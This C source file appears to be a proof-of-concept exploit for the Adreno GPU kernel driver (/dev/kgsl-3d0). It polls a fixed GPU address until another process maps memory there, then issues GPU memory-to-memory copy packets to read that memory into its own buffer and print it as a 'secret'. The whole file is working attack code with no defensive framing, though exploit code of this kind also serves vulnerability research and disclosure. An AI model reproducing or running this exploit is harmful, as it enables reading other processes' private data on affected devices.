#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>

#include "whirlybird.h"

#define FIRST_GPUADDR   0x500000000

int fd;

void whirlybird(void) {
	struct kgsl_gpumem_get_info info;
	struct kgsl_gpumem_alloc copy_alloc, data_alloc;
	uint64_t secret_gpuaddr = 0x500000000;
	uint32_t *copy_buf, *copy_cmds;
	char *data_buf;
	uint32_t ctx_id, copy_cmds_size;
	int ret, i;
	size_t page_size;

	page_size = sysconf(_SC_PAGESIZE);

	while(1) {
		sleep(5);

		memset(&info, 0, sizeof(struct kgsl_gpumem_get_info));
		info.gpuaddr = secret_gpuaddr;

		ret = ioctl(fd, IOCTL_KGSL_GPUMEM_GET_INFO, &info);

		if (ret == -1) {
			continue;
		}

		ret = kgsl_ctx_create0(fd, &ctx_id);

		if (ret) {
			printf("e: kgsl_ctx_create0 failed\n");
			exit(-1);
		}

		memset(&copy_alloc, 0, sizeof(struct kgsl_gpumem_alloc));
		memset(&data_alloc, 0, sizeof(struct kgsl_gpumem_alloc));

		copy_alloc.size = page_size;
		data_alloc.size = page_size;

		ret = ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC, &copy_alloc);

		if (ret == -1) {
			printf("e: copy alloc ioctl failed\n");
			exit(-1);
		}

		ret = ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC, &data_alloc);

		if (ret == -1) {
			printf("e: data alloc ioctl failed\n");
			exit(-1);
		}

		copy_buf = (uint32_t *) mmap(NULL, page_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, copy_alloc.gpuaddr);

		if (copy_buf == MAP_FAILED) {
			printf("e: copy buf map failed\n");
			exit(-1);
		}

		data_buf = (char *) mmap(NULL, page_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, data_alloc.gpuaddr);

		if (data_buf == MAP_FAILED) {
			printf("e: data buf map failed\n");
			exit(-1);
		}

		copy_cmds = copy_buf;

		for (i = 0; i < 16; i += 4) {
			*copy_cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
			*copy_cmds++ = 0;
			copy_cmds += cp_gpuaddr(copy_cmds, data_alloc.gpuaddr + i);
			copy_cmds += cp_gpuaddr(copy_cmds, secret_gpuaddr + i);
		}

		copy_cmds_size = (copy_cmds - copy_buf) * 4;

		ret = kgsl_gpu_command(fd, ctx_id, copy_alloc.gpuaddr, copy_cmds_size);

		if (ret == -1) {
			printf("e: kgsl_gpu_command failed\n");
			exit(-1);
		}

		usleep(50000);

		printf("secret: %s\n", data_buf);
		fflush(stdout);

		return;
	}

	return;
}

int main(void) {
	pid_t pid, target_pid;
	int status;

	pid = fork();

	if (pid) {
		waitpid(pid, &status, 0);
		exit(0);
	}
	else {
		fd = open("/dev/kgsl-3d0", O_RDWR);

		if (fd == -1) {
			printf("e: opening kgsl-3d0\n");
			return -1;
		}

		printf("victim pid: %d\n", getpid());
		fflush(stdout);

		if (fork()) {
			exit(0);
		}

		whirlybird();
	}

	return 0;
}
